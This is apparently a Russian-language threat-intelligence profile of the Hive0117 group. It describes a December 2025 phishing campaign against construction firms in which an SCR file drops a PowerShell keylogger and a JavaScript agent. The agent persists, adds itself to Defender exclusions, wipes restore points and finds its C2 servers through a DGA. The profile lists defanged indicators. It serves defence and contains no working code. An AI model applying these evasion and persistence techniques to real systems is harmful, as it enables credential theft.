e26e5b8e37c2edbc330d319f201d5982
d30609b6e7492435a6bdcea67834c996
990a0ecf6ced5bf7d7b1f88f2827949f

Hive0117

Другие названияWatch Wolf
Ratopak Spider
UAC-0008
Начало активности2022
ИнструментыDarkWatchman
Buhtrap
FlawedAmmyy
UltraVNC
География атакЛатвия
Литва
Россия
США
Украина
Эстония
Атакуемые отраслиИндустрия гостеприимства 
Логистические компании 
Правительственный сектор 
Производство 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

В декабре 2025 года группа киберразведки TI-департамента фиксировала массовую фишинговую рассылку группировки Hive0117. Кампания была ориентирована на организации строительного сектора и использовала типовую легенду с документами во вложении и паролем к архиву в теле письма.

Рисунок 32. Фишинговое письмо
Рисунок 32. Фишинговое письмо

Механика заражения соответствует цепочке, описанной специалистами PT ESC ранее, и принципиально не изменилась.

После открытия запароленного архива пользователь видит исполняемый файл, название которого повторяет тему письма. При запуске исполняемого SCR-файла происходит распаковка PowerShell-кейлоггера и вредоносного JavaScript-скрипта, после чего JavaScript-код запускается через wscript.exe. Для маскировки активности пользователю дополнительно показывается правдоподобное окно ошибки, тогда как вредоносный скрипт продолжает исполняться в фоновом режиме.

Рисунки 33–34. Вредоносные файлы и окно ошибки

Далее вредоносное ПО осуществляет закрепление: при первом запуске создается задача на автозапуск в планировщике заданий и прописываются служебные параметры в реестре. Для снижения вероятности детектирования скрипт добавляет себя в исключения Microsoft Defender и, при наличии административных прав, очищает точки восстановления.

Управляющая инфраструктура выбирается гибридно: сначала агент перебирает жестко заданный список стартовых доменов и кэширует «рабочий» домен в реестре, а при недоступности кэша переходит к генерации доменов через DGA-механизм и подбору пула валидных C2-серверов. Кейлоггер хранится в реестре в XOR-кодировке и запускается «тихим» PowerShell-процессом в скрытом режиме с передачей полезного фрагмента в Base64 через powershell.exe, после чего JavaScript-код выгружает собранные нажатия на сервер управления.

Доменыvektor-k[.]cfd
IP-адреса91.92.240[.]129
Имена файловДокументы от 03.12.2025.scr
Контрольные суммы4654d6573891a3ac533b3df11e76fb3c
61b417786b39f3a49b398fbf5a214480
58a5c25a1df158bf656bcfb3b205d837